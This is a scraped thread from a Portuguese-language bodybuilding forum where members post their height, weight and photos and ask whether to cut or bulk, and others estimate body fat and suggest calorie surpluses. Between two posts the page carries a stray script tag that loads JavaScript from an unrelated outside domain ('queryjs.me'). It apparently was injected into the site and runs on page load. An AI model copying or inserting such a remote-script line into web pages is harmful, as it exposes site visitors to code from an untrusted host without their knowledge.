Ir para conteúdo
  • Cadastre-se

[Oficial] Devo Fazer Cutting ou Bulking? Poste sua foto!


Hipertrofia.org

Posts Recomendados

profile3.jpg

Belo shape, só achei o peito e perna um pouco menor que o resto, não sei se é o sono, mas tá top e tipo, li que quer mais definição depois que terminar o bulk, nê? Maneiro. Vai ficar legal.

Valeu, irmão. Devo partir pro bulk bem limpo mesmo e sem pressa. Por já ter sido bem gordo é meio foda, bate um receio de ganhar muita gordura... mas brigadão!

Tenha medo do bulk limpo não, porque mais massa magra só vai te ajudar a gastar calorias, acelerar o metabolismo. É bom ir com calma, os resultados vão vir, mas sem medo. Você já melhorou bastante, tem que encarar isso como um novo estilo de vida. De verdade.

Link para o comentário
Compartilhar em outros sites

Publicidade

Atura : 170

peso 69kg

quanto vcs chutariam meu bf?

IMG_0010_zpsbgznghgj.jpg

em 1 ano ganhei 10 kg sai de 59 kg para 69kg , devo fazer um cutt leve ou continuo no bulk (aproveitando q o inverno ta chegando kkk) lembrando que pretendo ficar com um shape fitness tipo do Tony Do , ele tem mesma altura e pesa 70kg

Tony-Do-_zpsn8fz9lzr.jpg

Editado por Starolive
Link para o comentário
Compartilhar em outros sites

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Atura : 170

peso 69kg

quanto vcs chutariam meu bf?

IMG_0010_zpsbgznghgj.jpg

em 1 ano ganhei 10 kg sai de 59 kg para 69kg , devo fazer um cutt leve ou continuo no bulk (aproveitando q o inverno ta chegando kkk) lembrando que pretendo ficar com um shape fitness tipo do Tony Do , ele tem mesma altura e pesa 70kg

Tony-Do-_zpsn8fz9lzr.jpg

Chuto 16%, não mais que isso. Talvez seja a iluminação.

Mas voce precisa ganhar mais massa ai jovem, nao da pra ver formato dos musculos, tira umas fotos em uma luz melhor e posta dinovo.

Ta fazendo dieta de bulk ? Disse que ganhou 10Kg em 1 ano.

Eu limparia mais a dieta porque creio que vc nao siga uma e continuaria no bulk mas comendo mais limpo e com pelo menos umas 2500kcal (se for natural) ou umas 3000kcal (onfire rs).

Link para o comentário
Compartilhar em outros sites

Entao, eu sigo uma dieta limpa sim, nesses 10 kg eu usava um excedente de umas 500 calorias, minha duvida era em relacao a bf msm , voce acha que se eu continuar com um excedente de 500 calorias e ir para uns 80 kg depois eu faco um cutt da pra ficar com um shape legal?? lembrando que eu to fazendo o treino SL5x5

4l38gn.jpg

2cooe13.jpg

2im7r12.jpg

Link para o comentário
Compartilhar em outros sites

Ola boa tarde a todos.

Voltei a treina a 2 meses, estou. Me alimentando totalmente normal para ganho, porem não bulk.

Meu objetivo, e ser grande do tamanho do Arnold, visto que tenho 1,91 de altura.

Peso atualmente os 90kg

Venho consultar vossa opinião, penso em chegar a 110,00 kg 20kg a mais do meu corpo normal, e ai sim fazer cut e ficar com meu corpo bacana nos 90kg de massa magra que seria um estagio bacana para poder começar novamente o ciclo.

Atenciosamente aguardo opiniões.

http://imgur.com/b05Ek3O

7vN1s1a.jpg

PCWCint.jpg

Editado por eduardomachadox
Link para o comentário
Compartilhar em outros sites

Amigo, pra começar, você não vai ficar do tamanho do Arnold de forma natural.
Essa idéia de aumentar mais uns 20kgs e depois diminuir pode não prestar se você for natural. Procure fazer uns bulkings e cuttings mais curtos, levando o BF até uns 9% no cutting, e até no max uns 15, 16% no bulking.

Eu de ti aproveitava o inverno e levava o bulking até uns 95kgs, no máximo 100, depois fazia um bom cutting.

Link para o comentário
Compartilhar em outros sites

E aí, Cassio. Obg! Tu não acha q tem pouco volume pra cutt? Tava pensando em bulkar até uns 83/84kg até junho pra depois entrar em cutt... cutt é chato pra caralho kkkkk

Abraços.

Cara.. Pela foto achei vc volumoso, mas posta as medidas aí pra ver,. Pelo peso dá a entender que precisa de Cutting, 1,70 p/ 80kgs.

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...